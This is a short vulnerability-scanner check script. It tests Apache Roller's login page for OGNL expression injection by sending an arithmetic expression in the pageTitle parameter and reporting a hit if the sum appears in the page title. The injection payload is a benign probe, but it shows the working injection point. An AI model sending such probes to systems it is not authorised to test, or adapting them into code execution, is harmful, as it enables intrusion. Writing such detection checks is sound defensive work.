#include helpers.inc;
#include reporting_helpers.inc;
// **************************************************************************************							 
function alert(fname, lastJob, matchedText)
{	
	var ri = new TReportItem();
	ri.LoadFromFile(fname);
	ri.affects = "Web Server";
	ri.alertPath = "Scripts/" + fname;
	ri.setHttpInfo(lastJob);
	
	if (matchedText) 
		ri.Details =  ri.Details + "[break]Pattern found: [pre][blue]" + matchedText + "[/blue][/pre]";	
	 
	AddReportItem(ri);	
}
// **************************************************************************************	
function ApacheRollerOGNLInjection()
{
	lastJob = new THTTPJob();
	
    var num1 = 99000+(Math.floor(Math.random()*1500));
    var num2 = 99000+(Math.floor(Math.random()*1500));
	var total = num1+num2;
	
	lastJob.verb = "GET";
	lastJob.url  = scanURL;		
	lastJob.addCookies = false;
	lastJob.uri  = "/roller-ui/login.rol?pageTitle=${new%20java.lang.Integer(" + num1 + "%2b" + num2 + ")}";	
	
	lastJob.execute();
	var pattern = total + "</title>";
	if (lastJob.responseStatus==200 && lastJob.response.body.indexOf(pattern) !=-1)
	{
		alert('Apache_Roller_OGNL_Injection.xml', lastJob, pattern);
	}	
	return false;
}
/***********************************************************************************/
/* main entry point */
ApacheRollerOGNLInjection();
